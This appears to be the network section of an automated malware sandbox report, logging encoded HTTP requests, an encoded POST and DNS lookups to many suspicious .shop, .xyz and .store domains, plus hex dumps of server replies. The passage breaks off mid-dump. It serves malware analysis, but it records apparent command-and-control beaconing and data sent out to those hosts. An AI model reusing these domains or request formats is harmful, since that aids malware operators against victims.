                Source: global trafficHTTP traffic detected: GET /oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.milp.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.did-ready.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.deacapalla.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.1337street.shop
                Source: global trafficDNS traffic detected: DNS query: www.mosquitoxp.lol
                Source: global trafficDNS traffic detected: DNS query: www.clubhoodies.shop
                Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
                Source: global trafficDNS traffic detected: DNS query: www.winningpath.xyz
                Source: global trafficDNS traffic detected: DNS query: www.buyspeechst.shop
                Source: global trafficDNS traffic detected: DNS query: www.dodowo.shop
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.did-ready.info
                Source: global trafficDNS traffic detected: DNS query: www.vipstargold.buzz
                Source: global trafficDNS traffic detected: DNS query: www.deacapalla.online
                Source: global trafficDNS traffic detected: DNS query: www.thomet.net
                Source: global trafficDNS traffic detected: DNS query: www.apptj7.xyz
                Source: global trafficDNS traffic detected: DNS query: www.infovea.tech
                Source: unknownHTTP traffic detected: POST /4p8s/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.winningpath.xyzOrigin: http://www.winningpath.xyzReferer: http://www.winningpath.xyz/4p8s/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 211User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4e 68 65 46 43 78 44 51 69 45 4c 47 67 75 36 66 78 47 4a 68 6d 6c 55 32 31 49 4c 35 30 44 73 32 41 6c 4e 34 75 4d 38 2b 43 4d 57 6f 35 6f 75 4d 69 68 61 70 73 35 32 68 2b 51 7a 4a 56 4e 32 4c 37 4a 4f 79 69 77 58 4c 64 35 56 58 75 71 2b 79 57 74 7a 6b 30 74 45 36 35 50 56 48 51 4b 69 4b 33 43 78 5a 4a 59 52 52 38 38 76 4a 72 37 73 57 6a 75 75 6c 37 66 57 72 5a 34 43 63 77 2f 63 7a 44 31 35 64 6a 2b 61 53 7a 46 4c 75 72 61 74 6d 6f 5a 63 44 66 65 51 34 4e 72 54 70 4f 35 61 50 67 76 50 4d 46 34 73 42 43 2f 42 31 56 37 51 76 38 74 2f 57 4c 71 50 6c 50 4c 55 71 6d 73 66 62 Data Ascii: nzs0T2=hZAaBrxx1KFPNheFCxDQiELGgu6fxGJhmlU21IL50Ds2AlN4uM8+CMWo5ouMihaps52h+QzJVN2L7JOyiwXLd5VXuq+yWtzk0tE65PVHQKiK3CxZJYRR88vJr7sWjuul7fWrZ4Ccw/czD15dj+aSzFLuratmoZcDfeQ4NrTpO5aPgvPMF4sBC/B1V7Qv8t/WLqPlPLUqmsfb
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 19:48:54 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr537pJa80uD7vS8N5O%2BQqLW%2BhqzOMpDZF8PyFaPUKIXAj8eVc9eBAl6QZknnpRsyyr%2Bf8mhOFG6%2F82Hp1kHR9vArBt2kEw%2F4OjxRrWVDrXyCkb054B5s%2BgpqzFMhmLUerI4YN%2BOEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30a87f1e0f5b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=848&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzVcWSeeme6ttx0wfXPh57EmL0xkBVRfl8OFbe63aaWYakdL7xMSY7oF%2FNL15I2jzBiE0Ak%2FcJ380fSnsJRb%2FApe6D3Sj%2BZo8N6FicQpmQJ19vAJFO8xB0r3r9OL%2Bceu%2BRcNlk5zDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30b87b550f5b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=872&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_b+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmLav09NF1diV4TQQ10ObZImDP0HyhpxDukRJdCuQ8KTDEhhxXijN1xtcWUtPvh2sQ%2FH0vLNungj27aNSinRyp67g5iCey7N7pXul%2BUEduoivihgUyNcpK0KUcfhdwUbF2cw2dh6YQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30c85eb843b3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1885&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHbqSQHjPKquvRJKM0e3FIZr%2F0n%2BrkuGSQ36wCPGT3DzCpXH530QA5upd14kszqy7m2fUL5UAeggMbGZTKNv83t0ncJJqyAaukwNhUoLUk4Iv5xlw3em8IVBSAuVfMmtS0Iv0aUeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30d86a36727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=587&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 